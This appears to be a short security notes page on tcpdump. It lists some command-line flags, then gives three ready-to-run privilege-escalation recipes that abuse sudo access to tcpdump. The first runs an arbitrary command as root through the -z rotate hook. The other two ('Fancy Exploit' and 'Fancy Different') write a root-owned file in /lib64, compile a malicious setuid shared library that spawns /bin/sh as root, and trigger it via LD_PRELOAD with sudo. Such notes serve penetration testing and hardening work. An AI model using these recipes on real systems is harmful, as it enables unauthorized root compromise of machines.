TCPdump#
tcpdump flags#
-l Make stdout line buffered. Useful if you want to see the data while capturing it. E.g.,
-n Don't convert host addresses to names. This can be used to avoid DNS lookups.
-i interface
-w write raw packets to file
-W will limit the number of files created to the specified number,
and begin overwriting files from the beginning, thus creating a 'rotating' buffer.
-G rotates the dump file specified with the -w option every rotate_seconds seconds.
-z Used in conjunction with the -C or -G options, this will make tcpdump run " postrotate-command file " where file is the savefile being
closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.
-Z If tcpdump is running as root, after opening the capture device or input savefile,
but before opening any savefiles for output, change the
user ID to user and the group ID to the primary group of user
Classic GTFO Bin#
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
Fancy Exploit#
inline
timeout 1 sudo tcpdump -i eno49 -w /lib64/libvirt.so -Z $USER port 31337 2>/dev/null; echo 'void __attribute__((constructor)) init() { unlink("/lib64/libvirt.so"); setuid(0); setgid(0); execl("/bin/sh", "/bin/sh", "-i", 0); }' > ~/payload.c; gcc -w -fPIC -shared -o /lib64/libvirt.so ~/payload.c; rm ~/payload.c; chmod 6755 /lib64/libvirt.so; LD_PRELOAD=libvirt.so sudo
expanded
timeout 1 \
sudo tcpdump -i eno49 -w /lib64/libvirt.so -Z $USER port 31337 2>/dev/null; \
echo \
'void __attribute__((constructor)) init() {
unlink("/lib64/libvirt.so");
setuid(0);
setgid(0);
execl("/bin/sh", "/bin/sh", "-i", 0);
}' \
> ~/payload.c; \
gcc -w -fPIC -shared -o /lib64/libvirt.so ~/payload.c; \
rm ~/payload.c; \
chmod 6755 /lib64/libvirt.so; \
LD_PRELOAD=libvirt.so sudo
Fancy Different#
sudo tcpdump -i eth0 -Z $USER -G1 -W1 -w /lib64/libvirt.so 2> /dev/null; \
echo \
'void __attribute__((constructor)) init() {
unlink("/lib64/libvirt.so");
setuid(0);
setgid(0);
execl("/bin/sh", "/bin/sh", "-i", 0);
}' \
> ~/payload.c; \
gcc -w -fPIC -shared -o /lib64/libvirt.so ~/payload.c; \
rm ~/payload.c; \
chmod 6755 /lib64/libvirt.so; \
LD_PRELOAD=libvirt.so sudo